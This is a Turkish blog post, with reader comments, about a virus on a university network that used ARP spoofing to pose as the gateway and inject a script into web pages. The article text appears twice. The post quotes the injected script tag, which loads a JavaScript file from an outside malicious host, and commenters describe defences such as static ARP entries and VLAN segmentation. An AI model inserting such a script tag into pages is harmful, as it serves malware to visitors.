virus
merhaba arkadaslar,
son bir kac aydır üniversitemizin tüm network'ünü duman eden bir virüs ile başımız dertte idi. antivirus programları bazı web sitelerine bağlanırken virüs bulundu (ANI.GEN , Trojan Downloader, Alman/NAB vs. gibi) uyarısı veriyor ancak pc'yi tarattığımızda hiç bir virüse rastlanmıyordu. işin ilginç yanı bir çok web sitesine bağlanırken html sayfasının kaynağını görüntüle dediğimizde aşağıdaki script kodunun eklendiğini gördük.
<SCRIPT LANGUAGE="javascript1.2" SRC="http://g.asdafdgfgf.com/ads.js"></SCRIPT>
bir web sitesindeki (bazen bu adres 222360.com da olabiliyor) javascript dosyasını açmaya çalışıyordu virüs. ama işin ilginç olan yanı bilgisayarda virüs olmadığına emin olmamıza rağmen zaman zaman üstteki kodun girilen tüm sayfalarda çıkması idi. bu durumda bir kaç ihtimal kalıyordu. ağdaki trafiğe bir şekilde müdahale eden bir virüs söz konusu olmalıydı. virüs sadece yukardaki kodu girilen tüm sayfalara enjekte etmekle kalmıyor, ağda müthiş bir trafik oluşturuyor, internet bağlantısını yavaşlatıyor hatta çoğu zaman iptal ediyordu. internette forumlarda defalarca bu konuyu aradık, pek çok kişi aynı dertten muzdarip idi ancak bir çözüm yoktu. geçenlerde hindistan menşeili bir servis sağlayıcının benzer bir problemden dolayı müşterilerine sunduğu çözüme ulaştım. virüsün olayı şu idi:
-arp spoofing (arp poisoning) adı verilen teknik ile switch tabanlı bir ağda kendisini gateway/router gibi tanıtıyordu
-böylece siz bir web sitesine bağlanmaya çalışınca gateway olarak virüslü bilgisayara bağlanıyordunuz
-o bilgisayarda ilgili web sitesini size gösterirken kendi kodunuda sayfanın en üstüne enjekte ediyordu
-tabi sizin tüm internet trafiğiniz virüslü o bilgisayar tarafından süzülüyordu bu da tüm şifre ve yazışmalarında süzüldüğü anlamına geliyor
çözüm ise basit: ağda gerçekten virüslü olan makineleri tespit edip virüslerini temizlemek. ancak üniversite gibi 1000lerce bilgisayarın buluduğu ve bir kontrolün olmadığı ortamlarda bunu yapmak pek pratik değil. ama hindu amcalar ufak bir yazılım ile ağda arp spoofing yapan makinelerin iplerini tespit edebilmişler.
3-4 gündür bilgisayarımda bu yazılımı çalıştırarak virüslü bilgisayarları tespit etmeye çalışıyorum. bir bilgisayarı yakaladık ve virüsünü temizledik. şimdilik problemler azaldı ancak tamamen düzelmesi zaman alacak gibi görünüyor. virüsten muzdarip olanlara allah kolaylık versin diyorum.
bu arada bu virüsle ilgilenirken arp spoofing olayını da inceledim. bu yöntemle ağdaki trafiği dinlemeniz (sniffing) mümkün. bağlanılan web sitelerini, ağdaki msn konuşmalarını hatta msn web cam görüntülerini yakalamak için onlarca yazılım olduğunu gördüm. ama bu iş çok sakat. her dakika ağda arp spoofing yapan varmı diye bakamayız ki? mahremiyet diye bişey kalmamış oluyor. bence antivirüs yazılımlarına bu özellik eklenmeli, ağda spoofing yapan makineleri tespit etmeli ve ona göre önlem almalı.
son bir kac aydır üniversitemizin tüm network'ünü duman eden bir virüs ile başımız dertte idi. antivirus programları bazı web sitelerine bağlanırken virüs bulundu (ANI.GEN , Trojan Downloader, Alman/NAB vs. gibi) uyarısı veriyor ancak pc'yi tarattığımızda hiç bir virüse rastlanmıyordu. işin ilginç yanı bir çok web sitesine bağlanırken html sayfasının kaynağını görüntüle dediğimizde aşağıdaki script kodunun eklendiğini gördük.
<SCRIPT LANGUAGE="javascript1.2" SRC="http://g.asdafdgfgf.com/ads.js"></SCRIPT>
bir web sitesindeki (bazen bu adres 222360.com da olabiliyor) javascript dosyasını açmaya çalışıyordu virüs. ama işin ilginç olan yanı bilgisayarda virüs olmadığına emin olmamıza rağmen zaman zaman üstteki kodun girilen tüm sayfalarda çıkması idi. bu durumda bir kaç ihtimal kalıyordu. ağdaki trafiğe bir şekilde müdahale eden bir virüs söz konusu olmalıydı. virüs sadece yukardaki kodu girilen tüm sayfalara enjekte etmekle kalmıyor, ağda müthiş bir trafik oluşturuyor, internet bağlantısını yavaşlatıyor hatta çoğu zaman iptal ediyordu. internette forumlarda defalarca bu konuyu aradık, pek çok kişi aynı dertten muzdarip idi ancak bir çözüm yoktu. geçenlerde hindistan menşeili bir servis sağlayıcının benzer bir problemden dolayı müşterilerine sunduğu çözüme ulaştım. virüsün olayı şu idi:
-arp spoofing (arp poisoning) adı verilen teknik ile switch tabanlı bir ağda kendisini gateway/router gibi tanıtıyordu
-böylece siz bir web sitesine bağlanmaya çalışınca gateway olarak virüslü bilgisayara bağlanıyordunuz
-o bilgisayarda ilgili web sitesini size gösterirken kendi kodunuda sayfanın en üstüne enjekte ediyordu
-tabi sizin tüm internet trafiğiniz virüslü o bilgisayar tarafından süzülüyordu bu da tüm şifre ve yazışmalarında süzüldüğü anlamına geliyor
çözüm ise basit: ağda gerçekten virüslü olan makineleri tespit edip virüslerini temizlemek. ancak üniversite gibi 1000lerce bilgisayarın buluduğu ve bir kontrolün olmadığı ortamlarda bunu yapmak pek pratik değil. ama hindu amcalar ufak bir yazılım ile ağda arp spoofing yapan makinelerin iplerini tespit edebilmişler.
3-4 gündür bilgisayarımda bu yazılımı çalıştırarak virüslü bilgisayarları tespit etmeye çalışıyorum. bir bilgisayarı yakaladık ve virüsünü temizledik. şimdilik problemler azaldı ancak tamamen düzelmesi zaman alacak gibi görünüyor. virüsten muzdarip olanlara allah kolaylık versin diyorum.
bu arada bu virüsle ilgilenirken arp spoofing olayını da inceledim. bu yöntemle ağdaki trafiği dinlemeniz (sniffing) mümkün. bağlanılan web sitelerini, ağdaki msn konuşmalarını hatta msn web cam görüntülerini yakalamak için onlarca yazılım olduğunu gördüm. ama bu iş çok sakat. her dakika ağda arp spoofing yapan varmı diye bakamayız ki? mahremiyet diye bişey kalmamış oluyor. bence antivirüs yazılımlarına bu özellik eklenmeli, ağda spoofing yapan makineleri tespit etmeli ve ona göre önlem almalı.
gönderen: Rifat KURBAN @ 9:04 PM
5 Yorumlar:
9:28 PM,
david santos dedi…
Thanks for your posting and have a good weekend
12:03 PM,
Adsız dedi…
linux dünyasına bekleriz ;)
9:55 PM,
yaşar yılmazer dedi…
Bir bilgisayar üzerinden gönderilen byte göre router olarak kurban olan makinayı buldum. En dogru şekilde dediginiz gibi tüm agdan kurtulmak icin hayli bir zaman ve emek gerekiyor. Bilgileriniz icin tşkler. iyi çalışmalar.
3:33 PM,
Ali AYEN dedi…
Rıfat hocam merhaba,
ARP spoofing yapan kalleştir diye bi yorum gireyim diyecektim :)
Biraz zahmetli de olsa, en azından kendi bilgisayarını kurtarmak için şu yöntemi kullanabiliriz:
komut satırından arp -a komutunu verip doğru gateway in MAC adresini alırız. Emin olmak için sistem yöneticisine teyit ettirebilir veya bir kaç defa arp -d yapıp herhangi bir adresi ping leriz, tekrar arp -a yapıp ARP çözümlemesinin sonucunu inceleriz. teorik olarak, bilgisayarınızın bağlı olduğu switch e daha yakın olan ARP yanıtlayıcısı daha hızlı cevap verecektir, ancak virüs bulaşmış bir bilgisayarın performans sıkıntılarını göz önüne alırsak bir kaç denemeden sonra başka bir MAC bulmamız olasıdır.
daha sonra, arp -s gateway_adresi mac_adresi komutu ile statik ARP girdisi oluşturabiliriz.
Aslında küçük bir yazılım ile, gateway in Netbios ismini kullanıcıya onaylatmak ve eğer onaylarsa statik ARP kaydı girmek mümkün olabilir :)
4:54 PM,
Rifat KURBAN dedi…
cozumun gayet pratikmis ali, tesekkurler. fakultede bizde şöyle bir yapılanmaya gittik: managable switchleri VLAN'lara ayirdik. her bir koridoru bir VLAN olarak tanimladik ve o koridordaki tüm uçlari tek bir switchde topladik. boylece virus aktif olursa sadece ilgili VLAN'da aktif olabiliyor, diger VLAN'lar etkilenmiyor. Her VLAN'in gatewayi farkli sonucta. Virus atagi baslarsa bulmak da cok zor olmuyor cunku buyuk bir networkü kucuk parcalara bolmus oluyorsunuz. herkese virussuz gunler.
linuxcu arkadasa cevap: bu arada linux kullanan clientlerde virusten etkileniyor. ama tum fakulte linuxa gecerse o zaman sorun duzelebilir :D.
Yorum Gönder
<< Anasayfa